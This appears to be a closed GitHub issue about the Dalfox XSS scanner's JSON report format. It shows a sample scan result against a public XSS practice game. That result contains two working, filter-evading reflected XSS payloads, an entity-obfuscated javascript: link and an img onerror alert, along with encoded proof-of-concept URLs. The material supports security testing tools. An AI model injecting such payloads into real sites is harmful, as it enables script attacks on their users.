Closed hahwul closed 1 year ago
미리 감사합니다 대해커왕님
like this (authz0)
https://dalfox.hahwul.com/docs/json/
[
{
"type":"Type of PoC (G/R/V)",
"inject_type":"Injected Point",
"poc_type":"plain/curl/httpie/etc...",
"method":"HTTP Method",
"data":"PoC URL",
"param":"Parmeter",
"payload":"Attack Value",
"evidence":"Evidence with response body",
"cwe":"CWE ID",
"severity": "Severity (Low/Medium/High)"
}
]
--format=json
--report
--report-format='plain/json'
{
"logs": null,
"pocs": [
{
"type": "R",
"inject_type": "inHTML-URL",
"poc_type": "plain",
"method": "GET",
"data": "https://xss-game.appspot.com/level1/frame?query=%22%3E%3Ca+href%3Djavas%26%2399%3Bript%3Aalert%281%29%2Fclass%3Ddalfox%3Eclick",
"param": "query",
"payload": "\"\u003e\u003ca href=javas\u0026#99;ript:alert(1)/class=dalfox\u003eclick",
"evidence": "13 line: s were found for \u003cb\u003e\"\u003e\u003ca href=javas\u0026#99;ript:alert(1)/class=dalfox\u003eclick\u003c/b\u003e. \u003ca",
"cwe": "CWE-79",
"severity": "Medium"
},
{
"type": "V",
"inject_type": "inHTML-URL",
"poc_type": "plain",
"method": "GET",
"data": "https://xss-game.appspot.com/level1/frame?query=%27%3E%3Cimg%2Fsrc%2Fonerror%3D.1%7Calert%60%60+class%3Ddalfox%3E",
"param": "query",
"payload": "'\u003e\u003cimg/src/onerror=.1|alert`` class=dalfox\u003e",
"evidence": "13 line: s were found for \u003cb\u003e'\u003e\u003cimg/src/onerror=.1|alert`` class=dalfox\u003e\u003c/b\u003e. \u003ca href='?'",
"cwe": "CWE-79",
"severity": "High"
}
],
"params": [
{
"Name": "query",
"Type": "URL",
"Reflected": true,
"ReflectedPoint": "/inHTML-none(1)",
"ReflectedCode": "13 line: Sorry, no results were found for \u003cb\u003eDalFox\u003c/b\u003e. \u003ca href='?'\u003eTry again",
"Vuln": false,
"Chars": [
"+",
":",
"`",
"(",
"]",
"\\",
"=",
"\u003c",
"-",
"}",
")",
"|",
"'",
".",
"[",
"{",
"\u003e",
",",
"$",
"\"",
";"
]
}
],
"duration": 6779151542,
"start_time": "2022-09-16T11:16:17.914863+09:00",
"end_time": "2022-09-16T11:16:24.69388+09:00"
}
cc @hojyh1
Show parameter analysis result when finish scan
e.g